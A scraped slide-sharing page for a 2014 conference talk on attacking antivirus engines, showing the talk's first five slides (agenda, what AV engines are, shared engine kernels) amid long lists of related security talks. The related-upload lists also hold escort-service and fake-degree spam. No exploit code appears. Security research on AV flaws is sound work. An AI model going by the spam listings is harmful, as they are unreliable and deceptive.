Breaking av software
Breaking av softwareBreaking av software
Breaking av softwareThomas Pollet
ย 
Exploitation techniques and fuzzing
Exploitation techniques and fuzzingExploitation techniques and fuzzing
Exploitation techniques and fuzzingG Prachi
ย 
BeStorm Introduction
BeStorm IntroductionBeStorm Introduction
BeStorm IntroductionAmit Shirolkar
ย 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
ย 
Antivirus test-wholedynamic2010
Antivirus test-wholedynamic2010Antivirus test-wholedynamic2010
Antivirus test-wholedynamic2010nuttakorn nakkerd
ย 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
ย 
Application Virtualization
Application VirtualizationApplication Virtualization
Application Virtualizationsecurityxploded
ย 
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2securityxploded
ย 
Fuzzing
FuzzingFuzzing
FuzzingKhalegh Salehi
ย 
6unit1 virus and their types
6unit1 virus and their types6unit1 virus and their types
6unit1 virus and their typesNeha Kurale
ย 
Cansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthCansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthThierry Zoller
ย 
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVIncident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVAlexander Sverdlov
ย 
Outpost Anti-Malware 7.5
Outpost Anti-Malware 7.5Outpost Anti-Malware 7.5
Outpost Anti-Malware 7.5Lubov Putsko
ย 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
ย 
Lecture 12 malicious software
Lecture 12 malicious software Lecture 12 malicious software
Lecture 12 malicious software rajakhurram
ย 
Lecture malicious software
Lecture malicious softwareLecture malicious software
Lecture malicious softwarerajakhurram
ย 
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...The Linux Foundation
ย 
Commix
Commix Commix
Commix nullowaspmumbai
ย 
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox AnalysisAdvanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysissecurityxploded
ย 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysissecurityxploded
ย 
Perform fuzz on appplications web interface
Perform fuzz on appplications web interfacePerform fuzz on appplications web interface
Perform fuzz on appplications web interfaceIndicThreads
ย 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
ย 
Fuzzing 101 Webinar on Zero Day Management
Fuzzing 101 Webinar on Zero Day ManagementFuzzing 101 Webinar on Zero Day Management
Fuzzing 101 Webinar on Zero Day ManagementCodenomicon
ย 
Malicious software
Malicious softwareMalicious software
Malicious softwarerajakhurram
ย 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attackssecurityxploded
ย 
44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON
ย 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirusUltraUploader
ย 

More Related Content

What's hot

Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
ย 
Application Virtualization
Application VirtualizationApplication Virtualization
Application Virtualizationsecurityxploded
ย 
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2securityxploded
ย 
6unit1 virus and their types
6unit1 virus and their types6unit1 virus and their types
6unit1 virus and their typesNeha Kurale
ย 
Cansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthCansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthThierry Zoller
ย 
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVIncident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVAlexander Sverdlov
ย 
Outpost Anti-Malware 7.5
Outpost Anti-Malware 7.5Outpost Anti-Malware 7.5
Outpost Anti-Malware 7.5Lubov Putsko
ย 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
ย 
Lecture 12 malicious software
Lecture 12 malicious software Lecture 12 malicious software
Lecture 12 malicious software rajakhurram
ย 
Lecture malicious software
Lecture malicious softwareLecture malicious software
Lecture malicious softwarerajakhurram
ย 
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...The Linux Foundation
ย 
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox AnalysisAdvanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysissecurityxploded
ย 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysissecurityxploded
ย 
Perform fuzz on appplications web interface
Perform fuzz on appplications web interfacePerform fuzz on appplications web interface
Perform fuzz on appplications web interfaceIndicThreads
ย 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
ย 
Fuzzing 101 Webinar on Zero Day Management
Fuzzing 101 Webinar on Zero Day ManagementFuzzing 101 Webinar on Zero Day Management
Fuzzing 101 Webinar on Zero Day ManagementCodenomicon
ย 
Malicious software
Malicious softwareMalicious software
Malicious softwarerajakhurram
ย 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attackssecurityxploded
ย 

What's hot (20)

Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
ย 
Application Virtualization
Application VirtualizationApplication Virtualization
Application Virtualization
ย 
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2
Advanced Malware Analysis Training Session 3 - Botnet Analysis Part 2
ย 
Fuzzing
FuzzingFuzzing
Fuzzing
ย 
6unit1 virus and their types
6unit1 virus and their types6unit1 virus and their types
6unit1 virus and their types
ย 
Cansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depthCansecwest - The Death of AV defence in depth
Cansecwest - The Death of AV defence in depth
ย 
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IVIncident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
Incident Prevention and Incident Response - Alexander Sverdlov, PHDays IV
ย 
Outpost Anti-Malware 7.5
Outpost Anti-Malware 7.5Outpost Anti-Malware 7.5
Outpost Anti-Malware 7.5
ย 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
ย 
Lecture 12 malicious software
Lecture 12 malicious software Lecture 12 malicious software
Lecture 12 malicious software
ย 
Lecture malicious software
Lecture malicious softwareLecture malicious software
Lecture malicious software
ย 
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...
OSSEU17: How Open Source Project Xen Puts Security Software Vendors Ahead of ...
ย 
Commix
Commix Commix
Commix
ย 
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox AnalysisAdvanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
Advanced Malware Analysis Training Session 6 - Malware Sandbox Analysis
ย 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
ย 
Perform fuzz on appplications web interface
Perform fuzz on appplications web interfacePerform fuzz on appplications web interface
Perform fuzz on appplications web interface
ย 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
ย 
Fuzzing 101 Webinar on Zero Day Management
Fuzzing 101 Webinar on Zero Day ManagementFuzzing 101 Webinar on Zero Day Management
Fuzzing 101 Webinar on Zero Day Management
ย 
Malicious software
Malicious softwareMalicious software
Malicious software
ย 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
ย 

Similar to Breaking Antivirus Software

44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON
ย 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirusUltraUploader
ย 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuceDb Cooper
ย 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryonePaul Melson
ย 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareShan Kumar
ย 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INVijay Sarathy Rangayyan
ย 
It kamus virus security glossary
It kamus virus security glossaryIt kamus virus security glossary
It kamus virus security glossaryFathoni Mahardika II
ย 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
ย 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profitMohammed Adam
ย 
Computer viruses
Computer virusesComputer viruses
Computer virusesYousef Bahaa
ย 
How To Protect Your Home PC
How To Protect Your Home PCHow To Protect Your Home PC
How To Protect Your Home PCthatfunguygeek
ย 
Buffer overflows
Buffer overflowsBuffer overflows
Buffer overflowsSandun Perera
ย 
Security threats explained
Security threats explained Security threats explained
Security threats explained Abhijeet Karve
ย 
Computer viruses
Computer virusesComputer viruses
Computer virusesYousef Bahaa
ย 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
ย 
Security Handbook
Security Handbook Security Handbook
Security HandbookAnthony Hasse
ย 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharySaurav Chaudhary
ย 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
ย 

Similar to Breaking Antivirus Software (20)

44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software44CON 2014 - Breaking AV Software
44CON 2014 - Breaking AV Software
ย 
Attacking antivirus
Attacking antivirusAttacking antivirus
Attacking antivirus
ย 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
ย 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
ย 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_Spyware
ย 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
ย 
It kamus virus security glossary
It kamus virus security glossaryIt kamus virus security glossary
It kamus virus security glossary
ย 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
ย 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
ย 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profit
ย 
Antivirus
AntivirusAntivirus
Antivirus
ย 
Computer viruses
Computer virusesComputer viruses
Computer viruses
ย 
How To Protect Your Home PC
How To Protect Your Home PCHow To Protect Your Home PC
How To Protect Your Home PC
ย 
Buffer overflows
Buffer overflowsBuffer overflows
Buffer overflows
ย 
Security threats explained
Security threats explained Security threats explained
Security threats explained
ย 
Computer viruses
Computer virusesComputer viruses
Computer viruses
ย 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
ย 
Security Handbook
Security Handbook Security Handbook
Security Handbook
ย 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudhary
ย 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
ย 

Recently uploaded

Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
ย 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
ย 
Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...soniya singh
ย 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
ย 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
ย 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
ย 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEEVICTOR MAESTRE RAMIREZ
ย 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
ย 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
ย 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
ย 
Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Hr365.us smith
ย 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
ย 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
ย 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
ย 
GOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdfGOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdfAlina Yurenko
ย 
ๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ท
ๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ทๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ท
ๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ทumasea
ย 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
ย 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
ย 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
ย 

Recently uploaded (20)

Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
ย 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
ย 
Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi โžก๏ธ 8264348440 ๐Ÿ’‹๐Ÿ“ž Independent Escort S...
ย 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
ย 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
ย 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
ย 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEE
ย 
Hot Sexy call girls in Patel Nagar๐Ÿ” 9953056974 ๐Ÿ” escort Service
Hot Sexy call girls in Patel Nagar๐Ÿ” 9953056974 ๐Ÿ” escort ServiceHot Sexy call girls in Patel Nagar๐Ÿ” 9953056974 ๐Ÿ” escort Service
Hot Sexy call girls in Patel Nagar๐Ÿ” 9953056974 ๐Ÿ” escort Service
ย 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
ย 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
ย 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
ย 
Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)
ย 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
ย 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
ย 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
ย 
GOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdfGOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM โ€“ DEVOXX GREECE.pdf
ย 
ๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ท
ๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ทๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ท
ๅŠž็†ๅญฆไฝ่ฏ(UQๆ–‡ๅ‡ญ่ฏไนฆ)ๆ˜†ๅฃซๅ…ฐๅคงๅญฆๆฏ•ไธš่ฏๆˆ็ปฉๅ•ๅŽŸ็‰ˆไธ€ๆจกไธ€ๆ ท
ย 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
ย 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
ย 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
ย 

Breaking Antivirus Software

  • 1. Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 2014
  • 2. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 3. Antivirus products ๎€Š What is an Antivirus? Extracted from Wikipedia: ๎€Š โ€œAn antivirus is a software used to prevent, detect and remove malware such as computer virusesโ€. ๎€Š AV software can be focused in offering end- point protection (Workstation products) or file- server protection (Server products such as mail filters, SMB scanners, etc...). ๎€Š Overall, the general aim of an Antivirus is to offer a better level of protection than what the underlying operating system offers alone. ๎€Š And they often fail miserably...
  • 4. Antivirus Engines ๎€Š Common features of AV engines: ๎€Š Written in C/C++. ๎€Š Signatures based engine + heuristics. ๎€Š On-access scanners. ๎€Š Command line/GUI on-demand scanners. ๎€Š Support for compressed file archives. ๎€Š Support for packers. ๎€Š Support for miscellaneous file formats. ๎€Š Advanced common features: ๎€Š Packet filters and firewalls. ๎€Š Drivers to protect the product, anti-rootkits, etc... ๎€Š Anti-exploiting toolkits.
  • 5. Antivirus products, engines and bugs ๎€Š An antivirus engine is just the core, the kernel, of an antivirus product. ๎€Š Some antivirus engines are used by multiple products. ๎€Š For example, BitDefender is the most widely used antivirus kernel. It's used by many products like G-Data, QiHoo 360, eScan, F-Secure, etc... ๎€Š Most โ€œbigโ€ antivirus companies have their own engine but not all. And some companies, like F-Secure, integrate 3rd party engines in their products. ๎€Š In general, during this talk I will refer to AV engines, to the kernels, except when specified the word โ€œproductโ€. ๎€Š Also, unless specified as fixed, all bugs shown during this presentation are 0days.
